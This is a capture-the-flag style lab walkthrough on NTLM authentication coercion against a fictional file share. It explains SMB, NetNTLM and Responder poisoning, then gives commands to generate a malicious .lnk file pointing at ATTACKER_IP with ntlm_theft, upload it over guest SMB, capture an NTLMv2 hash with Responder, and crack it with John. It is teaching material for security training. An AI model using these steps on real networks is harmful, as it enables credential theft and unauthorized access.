## Coerced Authentication

**The Story**

McSkidy is unable to authenticate to her server! It seems that McGreedy has struck again and changed the password! We know it’s him since Log McBlue confirmed in the logs that there were authentication attempts from his laptop. Online brute-force attacks don’t seem to be working, so it’s time to get creative. We know that the server has a network file share, so if we can trick McGreedy, perhaps we can get him to disclose the new password to us. Let’s get to work!

- Learning Objectives
- The basics of network file shares
- Understanding NTLM authentication
- How NTLM authentication coercion attacks work
- How Responder works for authentication coercion attacks
- Forcing authentication coercion using lnk files

**NTLM Authentication**

In the Day 11 task, we learned about Active Directory (AD) and Kerberos authentication. File shares are often used on servers and workstations connected to an AD domain. This allows AD to take care of access management for the file share. Once connected, it’s not only local users on the host who will have access to the file share; all AD users with permissions will have access, too. Similar to what we saw on Day 11, Kerberos authentication can be used to access these file shares. However, we’ll be focusing on the other popular authentication protocol: NetNTLM or NTLM authentication.

Before we dive into NTLM authentication, we should first talk about the Server Message Block protocol. The SMB protocol allows clients (like workstations) to communicate with a server (like a file share). In networks that use Microsoft AD, SMB governs everything from inter-network file-sharing to remote administration. Even the “out of paper” alert your computer receives when you try to print a document is the work of the SMB protocol. However, the security of earlier versions of the SMB protocol was deemed insufficient. Several vulnerabilities and exploits were discovered that could be leveraged to recover credentials or even gain code execution on devices. Although some of these vulnerabilities were resolved in newer versions of the protocol, legacy systems don’t support them, so organisations rarely enforce their use.

NetNTLM, often referred to as Windows Authentication or just NTLM Authentication, allows the application to play the role of a middleman between the client and AD. NetNTLM is a very popular authentication protocol in Windows and is used for various different services, including SMB and RDP. It is used in AD environments as it allows servers (such as network file shares) to pass the buck to AD for authentication. 

**Responding to the Race**

There are usually lots of authentication requests and challenges flying around on the network. A popular tool that can be used to intercept them is Responder. Responder allows us to perform man-in-the-middle attacks by poisoning the responses during NetNTLM authentication, tricking the client into talking to you instead of the actual server they want to connect to.

On a real LAN, Responder will attempt to poison any Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS), and Web Proxy Auto-Discovery (WPAD) requests that are detected. On large Windows networks, these protocols allow hosts to perform their own local DNS resolution for all hosts on the same local network. Rather than overburdening network resources such as the DNS servers, first, hosts can attempt to determine if the host they are looking for is on the same local network by sending out LLMNR requests and seeing if any hosts respond. The NBT-NS is the precursor protocol to LLMNR, and WPAD requests are made to try to find a proxy for future HTTP(s) connections.

Since these protocols rely on requests broadcasted on the local network, our rogue device running Responder would receive them too. They would usually just be dropped since they were not meant for our host. However, Responder will actively listen to the requests and send poisoned responses telling the requesting host that our IP is associated with the requested hostname. By poisoning these requests, Responder attempts to force the client to connect to our AttackBox. In the same line, it starts to host several servers such as SMB, HTTP, SQL, and others to capture these requests and force authentication.


### Installation
```
cd /root/ntlm/ntlm_theft.py -h
```

Use to following command to create stealthy.link
```
python3 ntlm_theft.py -g lnk -s ATTACKER_IP -f stealthy

cd /stealthy
```

We will now add this file to the network file share to coerce authentication. Connect to the network file share on \\10.10.201.107\ElfShare\. You can use smbclient to connect as shown below:
```
cd stealthy
smbclient //10.10.201.107/ElfShare/ -U guest%
smb: \>put stealthy.lnk
smb: \>dir
```

The first command will connect you to the share as a guest. The second command will upload your file, and the third command will list all files for verification.  Next, we need to run Responder to listen for incoming authentication attempts. We can do this by running the following command from a terminal window:
```
responder -I ens5
```
You will have to replace `ens5` with your `tun` adapter for your VPN connection.

While we wait, use your connection to the network file share to download the key list he left us as a clue using ```get greedykeys.txt```. Once he authenticates, you will see the following in Responder
```
[SMB] NTLMv2-SSP Client   : ::ffff:10.10.113.170
[SMB] NTLMv2-SSP Username : ELFHQSERVER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::ELFHQSERVER:4eeec92382857ddc:415A5B96A1346CDBEBB75CC1348C99E9:010100000000000080AAC684BF39DA018503F73B5BB1A55D00000000020008004B0058004C00350001001E00570049004E002D004F005A0047003900580056005A00350045005300570004003400570049004E002D004F005A0047003900580056005A0035004500530057002E004B0058004C0035002E004C004F00430041004C00030014004B0058004C0035002E004C004F00430041004C00050014004B0058004C0035002E004C004F00430041004C000700080080AAC684BF39DA01060004000200000008003000300000000000000000000000003000007981C33397A1FC12D69A4520462344C0B1768BBF5BDB7769EDFDC7D46C3CD42E0A001000000000000000000000000000000000000900240063006900660073002F00310030002E00310030002E003100320033002E003100320031000000000000000000
[*] Skipping previously captured hash for ELFHQSERVER\Administrator

```

Perfect! Now that we have the challenge, let’s try to crack it to recover the new password. As mentioned before, the challenge was encrypted with the user’s NTLM hash. This NTLM hash is derived from the user’s password. Therefore, we can now perform a brute-force attack on this challenge in order to recover the user’s password. Copy the contents of the NTLMv2-SSP Hash portion to a text file called ```hash.txt``` using your favourite editor and save it. 
Then, use the following command to run John to crack the challenge:
```
john --wordlist=greedykeys.txt hash.txt
```

After a few seconds, you should receive the password. Magic! We have access again! Take back control by using the username and password to authenticate to the host via RDP!
```
john --wordlist=greedykeys.txt hash.txt
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
GreedyGrabber1@  (Administrator)
1g 0:00:00:00 DONE (2023-12-28 19:20) 50.00g/s 13150p/s 13150c/s 13150C/s Spring2017..starwars
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

```

## Conclusion
Coercing authentication with files is an incredible technique to have in your red team arsenal. Since conventional Responder intercepts are no longer working, this is a great way to continue intercepting authentication challenges. Plus, it goes even further. Using Responder to poison requests such as LLMNR typically disrupts the normal use of network services, causing users to receive Access Denied messages. Using lnk files for coercing authentication means that we are not actually poisoning legitimate network services but creating brand new ones. This lowers the chance of our actions being detected.

To connect to the Admin Server use: https://www.linux.fi/wiki/Remmina/ https://github.com/FreeRDP/Remmina